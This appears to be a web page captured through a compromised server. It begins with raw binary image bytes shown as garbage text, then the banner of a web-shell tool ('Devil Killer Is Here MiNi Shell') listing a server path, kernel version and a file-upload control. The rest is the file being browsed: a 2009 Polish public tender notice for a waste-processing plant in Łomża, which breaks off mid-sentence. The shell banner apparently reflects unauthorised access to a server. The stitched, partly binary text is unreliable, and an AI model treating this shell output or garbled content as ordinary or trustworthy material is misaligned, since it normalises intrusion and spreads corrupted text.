JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090915/319118-N-2009.html

<p class="kh_header"><b>Łomża: BUDOWA ZAKŁADU PRZETWARZANIA I UNIESZKODLIWIANIA ODPADÓW DLA MIASTA ŁOMŻY I OKOLICZNYCH GMIN W RAMACH PROJEKTU BUDOWA SYSTEMU GOSPODARKI ODPADAMI KOMUNALNYMI DLA MIASTA ŁOMŻA I OKOLICZNYCH GMIN</b><br>
<b>Numer ogłoszenia: 319118 - 2009; data zamieszczenia: 15.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Zakład Budżetowy , ul. Poznańska 141 141, 18-400 Łomża.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mpgkim.lomza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA ZAKŁADU PRZETWARZANIA I UNIESZKODLIWIANIA ODPADÓW DLA MIASTA ŁOMŻY I OKOLICZNYCH GMIN W RAMACH PROJEKTU BUDOWA SYSTEMU GOSPODARKI ODPADAMI KOMUNALNYMI DLA MIASTA ŁOMŻA I OKOLICZNYCH GMIN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Roboty budowlano-instalacyjne
1.	Wykonanie hali sortowni o wymiarach 65,82x35,11m z instalacjami elektrycznymi i sanitarnymi.
Konstrukcja hali stalowa. Rozpiętość ram głównych wynosi 7,20m, 8,10m i 9,30m. Pomiędzy głównymi układami nośnymi hali zaprojektowano układy pośrednie do oparcia obudowy. Pod słupy nośne zastosowano stopy fundamentowe żelbetowe z betonu B-25. Słupy zamontowane będą przy pomocy kotew. Wewnątrz hali znajduje się strefa przyjmowania odpadów zmieszanych, wydzielona poprzez ścianę żelbetową, pełniącą funkcję muru oporowego i będącą oparciem dla fragmentu ściany szczytowej. W hali zostanie zainstalowana linia technologiczna, układ linii urządzeń wymaga wykonania dwóch kanałów technologicznych.
Fundamentowanie. Pod słupy ram głównych zaprojektowano stopy fundamentowe żelbetowe z betonu B-25 zbrojone stalą A-III N. Pod wszystkimi stopami, ławami i podwaliną wykonać należy warstwę z podbetonu B-10 grubości 10 cm.
Belki powalinowe. Belki powalinowe z betonu B-25. Belki powalinowe spoczywają na cokołach stóp fundamentowych oraz podbetonie, ich grubość wynosi 30cm.
Ściana oporowa. Wewnątrz hali znajduje się strefa przyjmowania odpadów zmieszanych, wewnątrz hali i od strony ściany szczytowej przewiduje się wykonanie konstrukcji muru oporowego. Konstrukcja żelbetowa o wysokości 4,00m ponad poziom posadzki hali. Na ścianie oparto część słupów ściany szczytowej. Ława fundamentowa pod murem oporowym jest posadowiona na poziomie - 1,60m.
Kanały technologiczne w hali segregacji odpadów. Dwa kanały technologiczne o konstrukcji żelbetowej z betonu B-25 zbrojonego. Grubość ścian i den kanałów g=30cm, kanały posadowiono na poziomie - 3,00 -1,55 m i -2,40 -1,20 m. Dna kanałów oparte na warstwie podbetonu B-10 gr.10 cm.
Ściany działowe w hali sortowni. Ściana murowana, wysokość 3,0 m, oparta na ławach fundamentowych. Ściana gr. 25 cm z cegły pełnej klasy 15, na zaprawie cementowej 7.5. W miejscach występowania słupów przegrody wewnętrznej zaleca się bezpośrednie mocowanie słupów do podłoża - ława fundamentowa.
Konstrukcja posadzki w hali sortowni. Rodzaj i wytrzymałość posadzki - posadzka betonowa pod linią 50 N cm2, pod sitem 70 N cm2. Posadzka betonowa B-25 grubość 25 cm - zbrojona, włókna stalowe, impregnowana powierzchniowo. Geomembrana PEHD - 2mm. Beton B/10 gr. 10 cm. 
Izolacje. Przeciwwilgociowa pozioma część socjalnej: 2x papa na lepiku. Przeciwwilgociowa pozioma hali i sekcji przyjęć odpadów - folia PEHD gr. 2 mm. Przeciwwilgociowa na elementach żelbetowych: 2x Abizol R+P.
Instalacje elektryczne. Instalacja siłowa do odbiorników technologicznych i gniazd 230 400 V. Instalację elektryczną oświetleniową i gniazd wtykowych 230 V hali sortowni i pomieszczeń WC. Tablice rozdzielcze RG, RR i RS. Uziom i instalację odgromową budynku hali sortowni.
Instalacje sanitarne i technologiczne. Sieć hydrantowa w sortowni, sieci wod-kan w części socjalnej. Kanalizacja technologiczna do odprowadzenia wód zanieczyszczonych z mycia posadzek oraz z odwodnienia kanałów będzie odprowadzana pompowo i podłączona do korytek Acodrain przy bramach hali sortowni.
Obiekt wyposażony w sieć wentylacji mechanicznej oraz wentylację grawitacyjną.
Zadaszenie o konstrukcji stalowej o wymiarach 10x11 m od strony przenośnika balastu.
Zabezpieczenie elementów konstrukcji stalowych hali i obiektów : grubość powłoki malarskiej może wynosić min. 160 ?m. Dopuszcza się zabezpieczenie antykorozyjne; cynkowanie ogniowe.
2.	Budynek socjalno-administracyjny o konstrukcji kontenerowej - 12 szt. kontenerów.
Przylegający bezpośrednio i połączony z istniejącą częścią (pomieszczenia wagowego). Kontenerowy budynek o konstrukcji stalowej, posadowiony na fundamentach, Obiekt parterowy niepodpiwniczony. Bryła budynku w formie prostopadłościanu, dach jednospadowy. Obiekt składa się z 13 sztuk kontenerów (6 sztuk o wym. 638x244x288 cm, 6 sztuk o wym. 498x244x288 cm, 1 sztuka o wym. 742x244x288 cm - istniejący.)
Wyposażenie instalacyjne obiektu  - dostawa oraz montaż urządzeń oraz instalacji sanitarnych i elektrycznych wchodzi w skład kompletnej dostawy.
-	instalacja elektryczna oświetlenia i gniazd wtykowych (rozprowadzenie przewodów wykonane w listwach elektrycznych natynkowych, rozdzielnia główna na zewnątrz budynku z puszką elektryczną do przyłącza zewnętrznego),
-	instalacja elektryczna grzewcza - grzejniki elektryczne montowane na ścianach,
-	wentylacja - kratki wentylacyjne w ścianach zewnętrznych oraz wentylatory i wywietrzaki dachowe.
3.	Wiata magazynowa odpadów - o wymiarach 41,5x12,55 m.
Wykonana w konstrukcji żelbetowej ze stalowymi ryglami dachowymi. Rygle dachowe mocować przy pomocy kotew, na wcześniej przygotowanej podlewce. Składa się z pięciu boksów o wymiarach w rzucie 12,00 x 8,00m.
Konstrukcja wiaty odpadów surowcowych. Boksy zostały wydzielone przez wstawienie ścian żelbetowych grubości 25 cm o wysokości 2,50 m. Konstrukcja żelbetowa z betonu B-25, zbrojenie stalą A-III N. Ławę fundamentową posadowiono na poziomie -1,20 m, izolować 2xAbizol R+P. Zabezpieczenie antykorozyjne elementów stalowych. Obudowa dachu oparta na płatwiach Z350x3, rozmieszczonych co  180 cm.
Posadzka. Beton B-20 zbrojony 15cm. Zagęszczona podsypka piaskowa 10 cm. Geomembrana PEHD 1,5 mm. Podbeton B-10 15 cm. Piasek zagęszczony Is 0,97 20 cm.
Dach. Stalowa konstrukcja dachu jest wsparta na trzech słupkach żelbetowych wychodzących z każdej ze ścian wydzielających boksy. Pokrycie dachu wykonać z blachy trapezowej TR 35 na 207 gr. 0,63 mm mocowanej na ryglach stalowych rozmieszczonych w osiach ścian boksów.
4.	Wiata czasowego magazynowania odpadów niebezpiecznych.
Konstrukcja wiaty. Ściany grubości 25 cm, wyprowadzone 2,5 m ponad poziom posadzki wykonane z betonu B-25 zbrojone stalą A-III N. Rygle dachowe oparte są na żelbetowych słupach wychodzących ze ścian.
Posadzka. Beton B-20 zbrojony 15 cm, z powłoką chemoutwardzalną, nieiskrzącą. Zagęszczona podsypka piaskowa 10 cm. Geomembrana PEHD 1,5 mm. Podbeton B-10 15 cm. Piasek zagęszczony Is 0,97 20 cm.
Dach. Stalowa konstrukcja dachu jest wsparta na słupkach żelbetowych wychodzących ze ścian wydzielających boksy. Pokrycie dachu wykonać z blachy trapezowej np. TR 35/207 gr. 0,63 mm mocowanej na ryglach stalowych rozmieszczonych w osiach ścian boksów.
5.	Plac kompostowania pryzmowego - powierzchnia 2 020 m2 - uszczelniony, o konstrukcji żelbetowej.
6.	Plac przygotowania kompostu - powierzchnia 1 010 m2 - uszczelniony o konstrukcji żelbetowej.
7.	Plac przyjmowania odpadów wielkogabarytowych - powierzchnia 700 m2 o konstrukcji żelbetowej.
8.	Plac przetwarzania odpadów budowlanych - powierzchnia 3526 m2 o nawierzchni z tłucznia kamiennego.
3.2.   Roboty drogowe
Drogi i place manewrowe 
Wykonanie nawierzchni z kostki polbruk gr. 8 cm na podsypce cement-piaskowej o powierzchni 1626,0 m2. Wykonanie nawierzchni z płyt żelbetowych pełnych gr. 18 cm o powierzchni 471 m2. Wykonanie nawierzchni z płyt żelbetowych wielootworowych o powierzchni 429 m2. Ustawienie krawężników 100x30x15 na ławie betonowej 159 mb. Wykonanie nawierzchni z tłucznia o powierzchni 225 m2.
Stanowiska postojowe dla samochodów osobowych - o wymiarach 15x32,5 m z kostki brukowej o gr. 8 cm.
3.3.	Zewnętrzne sieci wod-kan zewnętrzne
 - wodociągowa fi 90 dł. 150m; kanalizacja sanitarna fi 160 mm dł. 41m; kanalizacja deszczowa fi 160mm, 200mm, 250mm, dł. ok. 300m; sieć kanalizacji technologicznej.
3.4.	Zewnętrzne sieci zasilania obiektów i oświetlenie terenu
- 10 szt. latarń. 
3.5.	Przyłącze wodociągowe 
Przyłącze wodociągowe z rur ciśnieniowych PE łączonych metodą zgrzewania Fi 110 mm - na długości 970 m. Przyłącze wodociągowe z rur ciśnieniowych PE łączonych metodą zgrzewania Fi 90 mm - na długości 2310 m.

3.6.	Dostawa, montaż, prace rozruchowe wraz z uruchomieniem instalacji linii sortowniczej,
3.7.	Dostawa wyposażenia 

Kontenery otwarte 17 m3	szt. 2
do gromadzenia odpadów i przystosowane do transportu przy pomocy samochodów typu hakowiec 
Pojemność 	ca 17 m3
Wymiary 
-	długość	min. 5,00 m
-	szerokość 	2,30 m
-	wysokość	ca 1,50 m
Opis wymagań dla wyrobu:
-	przystosowane do współpracy z samochodami wyposażonymi w urządzenia hakowe, 
-	zaczep hakowy 	1570 mm wg normy DIN 30 722,
-	poszycie dna - blacha St3	min.  4,5 mm
-	ściany boczne - blacha ST	min.  3,0 mm
-	rama nośna z dwuteownika 	180
-	ożebrowanie pionowe i podłużne na ścianach bocznych,
-	rozstaw belek a = 750 [mm]
-	wieniec z rury 	np. fi 88,9x7 mm,
-	dwie rolki zewnętrzne, jezdne	fi 160
-	drzwi dwuskrzydłowe z zawiasami z obu stron,
-	centralny zamek (zamknięcie drzwi),
-	zabezpieczenie antykorozyjne i malowanie	piaskowany, gruntowany i malowany nawierzchniowo farbami alkilowymi o łącznej grubości min. 80 ?m, lakierowany, 
-	stała szerokość pojemnika B=2300 [mm],
-	płozy (prowadnice pod kontenery),
Kontenery muszą być nowe.

Kontenery otwarte 26 m3	szt. 8
do gromadzenia odpadów i przystosowane do transportu przy pomocy samochodów typu hakowiec  
Pojemność 	ca 26 m3
Wymiary 
-	długość	max. 6,50 m
-	szerokość 	2,30 m
-	wysokość	ca 1,75 m
Opis wymagań dla wyrobu:
-	przystosowane do współpracy z samochodami wyposażonymi w urządzenia hakowe, 
-	zaczep hakowy 	1570 mm wg normy DIN 30 722,
-	poszycie dna - blacha St3	min.  4,5 mm
-	ściany boczne - blacha ST	min.  3,0 mm
-	rama nośna z dwuteownika 	180;
-	ożebrowanie pionowe i podłużne na ścianach bocznych,
-	rozstaw belek a = 750 [mm],
-	wieniec z rury np. fi 88,9x7 mm,
-	dwie rolki zewnętrzne, jezdne 	fi 160 mm
-	drzwi dwuskrzydłowe z zawiasami z obu stron,
-	centralny zamek (zamknięcie drzwi),
-	zabezpieczenie antykorozyjne i malowanie	piaskowany, gruntowany i malowany nawierzchniowo farbami alkilowymi o łącznej grubości min. 80 ?m, lakierowany, kolor 
wg katalogu farb RAL
-	stała szerokość pojemnika 	B=2300 [mm], 
-	płozy (prowadnice pod kontenery)	komplet,
Kontenery muszą być nowe..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.12.13-4, 45.11.20.00-5, 45.11.22.00-7, 45.11.25.00-0, 45.11.26.00-1, 45.22.21.10-3, 45.22.31.00-7, 45.22.31.10-0, 45.22.38.00-4, 45.31.61.10-9, 43.41.10.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca wnosi wadium w wysokości: 200 000,00 zł.
2.	Wadium wnosi się przed upływem terminu składania ofert, tj. najpóźniej do 08.10.2009 do godz. 10:00 . 
3.	Wadium musi obejmować okres związania ofertą 
4.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
1)  pieniądzu, 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)  gwarancjach bankowych, 
4)  gwarancjach ubezpieczeniowych, 
5)	poręczeniach udzielanych przez podmioty , o których mowa w art. 6b ust. 5 pkt 2 ustawy  z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158  z późn. zm.)
5.	Wadium wnoszone w pieniądzu należy wpłacić przelewem  na konto Bank BPH  nr konta: 24 1060 0076 0000 3210 0016 4072 
6.	Wadium wnoszone w pieniądzu powinno wpłynąć na rachunek bankowy Zamawiającego przed upływem składania ofert.
7.	Wadium wnoszone w pozostałych formach  należy dołączyć w oryginale do oferty i powinno być ważne przez cały okres związania ofertą. 
8.	Wadium wnoszone w gwarancjach i poręczeniach nie może zawierać żadnych warunków do spełnienia przez Zamawiającego, oprócz przewidzianych ustawą Prawo zamówień publicznych. Powyższe wadium musi być wpłacone na konto Zamawiającego w terminie 14 dni od daty dostarczenia pisemnego żądania zapłaty, zawierającego oświadczenie sporządzone na podstawie art. 46 ust. 5 lub 4a ustawy .
9.	Wykonawca, którego oferta została wybrana traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku gdy:
1) odmówi podpisania umowy na warunkach określonych w ofercie
2) nie wniósł zabezpieczenia należytego wykonania umowy
3) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy .
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn  nieleżących po jego stronie.
11.	Wykonawcy biorący udział w przetargu otrzymują zwrot wadium na warunkach określonych w art. 46 Ustawy .
12.	Wykonawcę, który wniesie wadium w pieniądzu prosimy o podanie nr rachunku bankowego, na który należy zwrócić wniesione wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 5.1 O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy spełniający niżej 
      wymienione warunki udziału w postępowaniu, którzy:
1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 
    ustawy nakładają obowiązek posiadania takich uprawnień;  
       W tym zakresie Zamawiający wymaga aby Wykonawcy:
  a)   prowadzili zarejestrowaną działalność gospodarczą w zakresie dotyczącym przedmiotu 
        zamówienia.
2)   Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 
      osobami do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych  
      podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
      zamówienia. 
      W tym zakresie Zamawiający wymaga aby Wykonawcy:
   a)  wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o 
        udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym 
        okresie, co najmniej 2 roboty budowlane polegające na budowie, przebudowie 
        obiektów wraz z infrastrukturą towarzyszącą typu drogi, place sieci i przyłącza o 
        kubaturze minimum 20.000 m3 i wartości nie mniejszej niż 10,0 mln zł brutto 
        każda oraz zrealizowali w okresie ostatnich trzech lat przed dniem wszczęcia  
        postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest 
        krótszy - w tym okresie co najmniej 1 dostawę o wartości nie mniejszej niż 5,0 mln zł 
        brutto, odpowiadającą swoim rodzajem dostawom stanowiącym przedmiot zamówienia. 
        Za dostawy odpowiadające swoim rodzajem dostawom stanowiącym przedmiot  
        zamówienia uznaje się dostawy równoważne z zakresem dostaw określonych w 
        rozdziale 3 w pkt. 3.6 SIWZ 
        stanowiącym przedmiot zamówienia.
   b) dysponowali osobami zdolnymi do realizacji zamówienia posiadającymi uprawnienia 
    do sprawowania funkcji: kierownika robót, kierowników w branżach:  
    - instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, 
      wodociągowych i kanalizacyjnych; 
    - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
    - konstrukcyjno- budowlanej w zakresie dróg; 
 Wykonawca przedstawi w ofercie kandydatów na każde stanowisko wymienione powyżej. 
 Do wykazu należy załączyć dokumenty stwierdzające, że osoby, które będą wykonywać 
 zamówienie w funkcji kierownika budowy, kierowników poszczególnych branż są uprawnieni  bez ograniczeń w swoich specjalnościach do kierowania robotami wraz z aktualnym 
 zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa oraz   
 oświadczeniami wskazanych osób o gotowości uczestnictwa w realizacji zamówienia wg.  
 samodzielnie napisanego załącznika.
 Zamawiający wymaga, aby osoby pełniące funkcję kierownika robót, posiadały co najmniej   10-letnie doświadczenie zawodowe przy realizacji inwestycji budowlanych w tym, co  
 najmniej 5-letnie doświadczenie zawodowe na stanowiskach kierowniczych podobnych  
 robót, a kierownicy poszczególnych branż co najmniej 5 letnie doświadczenie zawodowe w  
 tym, co najmniej 3-letnie doświadczenie zawodowe na stanowiskach kierowniczych.
 Dodatkowo, w odniesieniu do osoby pełniącej funkcję kierownika robót budowlanych,   
 Wykonawcy zobowiązani są do przedłożenia informacji dotyczącej jego 5-letniego  
 doświadczenia zawodowego w pracy na stanowisku kierownika robót w zakresie organizacji 
  i zarządzania robotami budowlanymi. Informacja ta winna zawierać:
- przedmiot zamówienia ( wykaz prowadzonych robót ),
- podmiot dla którego realizowane było zamówienie,
-  daty od ( miesiąc rok ) do ( miesiąc rok ) pełnienia funkcji kierownika robót budowlanych,
    Wymagane informacje winny jasno wskazywać doświadczenie kandydata w pełnieniu 
    funkcji kierownika robót.
3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
    W tym zakresie Wykonawca musi spełniać następujące warunki:
a) osiągnął w każdym z ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia 
    działalności jest krótszy - w tym okresie, przychody netto ze sprzedaży na poziomie nie 
    niższym niż wartość wycenionego przedmiotu zamówienia ( wartość podana w formularzu 
    ofertowym ).
    W celu potwierdzenia i weryfikacji przez Zamawiającego spełnienia powyższego  
    warunku Wykonawcy zobowiązani są przedłożyć sprawozdanie finansowe albo jego 
    część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o 
    rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, 
    a w przypadku Wykonawców niezobowiązanych do sporządzania sprawozdania 
     finansowego innych dokumentów określających obroty oraz zobowiązania i należności - 
     za ostatnie trzy lata obrotowe ( 2005-2007 ), a jeżeli okres prowadzenia działalności jest 
     krótszy - za ten okres,   
 b) posiada własne środki finansowe lub zdolność kredytową umożliwiającą realizację 
     zamówienia w wysokości nie mniejszej niż 8,0 mln zł ( słownie: osiem milionów zł ). 
     Na potwierdzenie spełnienia powyższego warunku Wykonawca jest zobowiązany  
     załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo -       
     kredytowej, w którym/których posiada rachunek bankowy, potwierdzającą w sposób 
     jednoznaczny wysokość posiadanych środków finansowych lub zdolność kredytową na 
     dzień składania oferty jeszcze nie zaangażowaną dla innych działań Wykonawcy.
4)  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
     W tym zakresie Zamawiający wymaga aby Wykonawcy:
 a) nie zalegali z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i 
     społeczne, 
 b) nie podlegali wykluczeniu z postępowania o udzielenie zamówienia publicznego.
5.2 Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych
     w pkt 6.1.2 SIWZ będzie stanowiło podstawę do oceny spełnienia warunków udziału
     w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń czy
     Wykonawca spełnia wszystkie w/w warunki. Z treści załączonych dokumentów musi 
     wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił. 

Uwaga:
1. Ocena spełniania przedstawionych powyżej warunków udziału w postępowaniu zostanie  dokonana wg. formuły spełnia - nie spełnia w oparciu o informacje zawarte w niniejszej SIWZ oraz w dokumentach i oświadczeniach wyszczególnionych w Rozdziale 6.
2. Zamawiający wykluczy z postępowania Wykonawcę, który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, że złożone przez niego informacje mające wpływ na wynik prowadzonego postępowania są nieprawdziwe.
3. Zgodnie z art. 26 ust. 3 ustawy Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust.1, lub którzy nie złożyli pełnomocnictw albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust.1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.1    Dokumenty i oświadczenia wymagane w postępowaniu Wykonawca zobowiązany jest  
         złożyć w terminie wskazanym w pkt 11.1 i formie określonej w Rozdziale 10 SIWZ:
6.1.1 Na ofertę składają się:
 1)    Dokumenty i oświadczenia wymienione w pkt 6.1.2 niniejszej specyfikacji.

6.1.2 W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy 
         zobowiązani są złożyć następujące oświadczenia i dokumenty:

1) wypełniony Formularz Ofertowy sporządzony ściśle wg wzoru druku załączonego do 
    SIWZ - załącznik nr 1;  
2) oświadczenie o spełnieniu warunków udziału w postępowaniu opisanych w art. 22 i nie 
